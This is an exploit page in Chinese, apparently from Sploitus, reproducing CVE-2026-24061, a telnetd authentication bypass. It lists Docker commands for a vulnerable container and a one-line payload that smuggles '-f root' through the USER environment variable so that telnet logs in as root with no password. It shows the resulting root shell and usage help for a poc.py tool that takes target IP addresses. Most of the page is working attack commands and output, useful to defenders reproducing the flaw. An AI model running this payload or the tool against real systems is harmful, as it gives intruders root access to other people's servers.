Share
## https://sploitus.com/exploit?id=E1D9358D-8372-5F71-8471-ED079FB4C438
# CVE-2026-24061
## 复现步骤
构建镜像
```
docker build -t telnetd-bypass .
```

启动容器
```
docker run -it --rm \
  --name telnetd-vuln \
  --privileged \
  -p 23:23 \
  telnetd-bypass
```

发送`payload`
```
USER='-f root' telnet -a 127.0.0.1 23
```

返回
```
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.10.14-linuxkit (c910afb30330) (pts/1)

Linux c910afb30330 6.10.14-linuxkit #1 SMP Tue Oct 14 07:32:13 UTC 2025 aarch64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 22 05:55:47 UTC 2026 from 172.64.155.119 on pts/1
root@c910afb30330:~#
```


## 复现脚本:

`python3 poc.py -h`

```
usage: poc.py [-h] -t TARGET [-p PORT]

CVE-2026-24061 Telnet NEW-ENVIRON RCE 漏洞检测工具

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标 IP 地址
  -p PORT, --port PORT  目标端口 (默认: 23)

示例:
  poc.py -t 192.168.1.100 -p 23
  poc.py --target 127.0.0.1 --port 23
```

# 参考链接:
- https://www.openwall.com/lists/oss-security/2026/01/20/2
- https://mp.weixin.qq.com/s/PA5EhntsCyWfQT2kTE1yNA